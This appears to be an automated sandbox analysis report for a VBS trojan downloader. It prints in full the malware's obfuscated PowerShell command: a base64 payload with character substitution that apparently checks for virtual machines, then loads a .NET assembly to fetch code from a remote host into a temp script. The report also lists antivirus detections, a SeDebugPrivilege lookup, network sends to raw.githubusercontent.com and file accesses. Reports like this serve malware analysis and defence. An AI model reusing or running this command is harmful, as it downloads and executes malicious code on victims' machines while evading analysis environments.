parameters: -command $LxAae = 'J✑B0✑C✑✑PQ✑g✑Ec✑ZQB0✑C0✑QwBp✑G0✑SQBu✑HM✑d✑Bh✑G4✑YwBl✑C✑✑dwBp✑G4✑Mw✑y✑F8✑YwBv✑G0✑c✑B1✑HQ✑ZQBy✑HM✑eQBz✑HQ✑ZQBt✑Ds✑J✑B0✑DI✑I✑✑9✑C✑✑J✑B0✑C4✑TQBh✑G4✑dQBm✑GE✑YwB0✑HU✑cgBl✑HI✑OwBp✑GY✑I✑✑o✑CQ✑d✑✑y✑C4✑QwBv✑G4✑d✑Bh✑Gk✑bgBz✑Cg✑JwBW✑E0✑dwBh✑HI✑ZQ✑n✑Ck✑I✑✑t✑G8✑cg✑g✑CQ✑d✑✑y✑C4✑QwBv✑G4✑d✑Bh✑Gk✑bgBz✑Cg✑JwBW✑Gk✑cgB0✑HU✑YQBs✑EI✑bwB4✑Cc✑KQ✑g✑C0✑bwBy✑C✑✑J✑B0✑DI✑LgBD✑G8✑bgB0✑GE✑aQBu✑HM✑K✑✑n✑Eg✑eQBw✑GU✑cg✑t✑FY✑Jw✑p✑Ck✑I✑B7✑Ds✑ZQB4✑Gk✑d✑✑7✑H0✑Ow✑k✑E8✑W✑BQ✑Ho✑Rw✑g✑D0✑I✑✑n✑CU✑VQBX✑Fc✑cwBq✑CU✑Jw✑7✑CQ✑QgBY✑Gk✑bwBN✑C✑✑PQ✑g✑Cc✑JQBs✑FU✑cwBO✑FE✑JQ✑n✑Ds✑WwBC✑Hk✑d✑Bl✑Fs✑XQBd✑C✑✑J✑BB✑Gg✑c✑BB✑Fc✑I✑✑9✑C✑✑WwBT✑Hk✑cwB0✑GU✑bQ✑u✑EM✑bwBu✑HY✑ZQBy✑HQ✑XQ✑6✑Do✑RgBy✑G8✑bQBC✑GE✑cwBl✑DY✑N✑BT✑HQ✑cgBp✑G4✑Zw✑o✑C✑✑J✑BC✑Fg✑aQBv✑E0✑LgBS✑GU✑c✑Bs✑GE✑YwBl✑Cg✑JwCTITo✑kyEn✑Cw✑I✑✑n✑EE✑Jw✑p✑C✑✑KQ✑7✑Fs✑UwB5✑HM✑d✑Bl✑G0✑LgBB✑H✑✑c✑BE✑G8✑bQBh✑Gk✑bgBd✑Do✑OgBD✑HU✑cgBy✑GU✑bgB0✑EQ✑bwBt✑GE✑aQBu✑C4✑T✑Bv✑GE✑Z✑✑o✑CQ✑QQBo✑H✑✑QQBX✑Ck✑LgBH✑GU✑d✑BU✑Hk✑c✑Bl✑Cg✑JwBD✑Gw✑YQBz✑HM✑T✑Bp✑GI✑cgBh✑HI✑eQ✑z✑C4✑QwBs✑GE✑cwBz✑DE✑Jw✑p✑C4✑RwBl✑HQ✑TQBl✑HQ✑a✑Bv✑GQ✑K✑✑n✑H✑✑cgBG✑FY✑SQ✑n✑Ck✑LgBJ✑G4✑dgBv✑Gs✑ZQ✑o✑CQ✑bgB1✑Gw✑b✑✑s✑C✑✑WwBv✑GI✑agBl✑GM✑d✑Bb✑F0✑XQ✑g✑Cg✑Jw✑0✑DY✑ZQBz✑GE✑QgBy✑GU✑dgBy✑GU✑Uw✑v✑G4✑aQBh✑G0✑LwBy✑GU✑d✑Bw✑Hk✑cgBj✑H✑✑VQ✑v✑Dg✑Nw✑1✑DE✑bwBh✑G8✑agBQ✑C8✑bQBv✑GM✑LgB0✑G4✑ZQB0✑G4✑bwBj✑HI✑ZQBz✑HU✑YgB1✑Gg✑d✑Bp✑Gc✑LgB3✑GE✑cg✑v✑C8✑OgBz✑H✑✑d✑B0✑Gg✑Jw✑g✑Cw✑I✑✑k✑E8✑W✑BQ✑Ho✑Rw✑g✑Cw✑I✑✑n✑FQ✑cgB1✑GU✑Jw✑g✑Ck✑I✑✑p✑✑==';$UrNXf = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $LxAae.replace('✑','A') ) ).replace('%lUsNQ%','').replace('%UWWsj%','C:\Users\test22\AppData\Local\Temp\bMfk.vbs');powershell -Command $UrNXf
filepath: powershell
1 1 0
ESET-NOD32 VBS/TrojanDownloader.Agent.YRA
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan-Downloader.Script.Generic
NANO-Antivirus Trojan.Script.Vbs-heuristic.druvzi
F-Secure Malware.VBS/YAV.Minerva.gixvr
Avira VBS/YAV.Minerva.gixvr
ZoneAlarm HEUR:Trojan-Downloader.Script.Generic
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

WSASend

buffer: |xdS¥Ë¡š®òHОAú ٍ¾YBBáãm”ƒ/5 ÀÀÀ À 287ÿraw.githubusercontent.com  
socket: 592
0 0

WSASend

buffer: 51dS·‚ǘnÞq-Z=üý%DyY'#eª¢'¬ý¶ð  ÿ
socket: 592
0 0
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe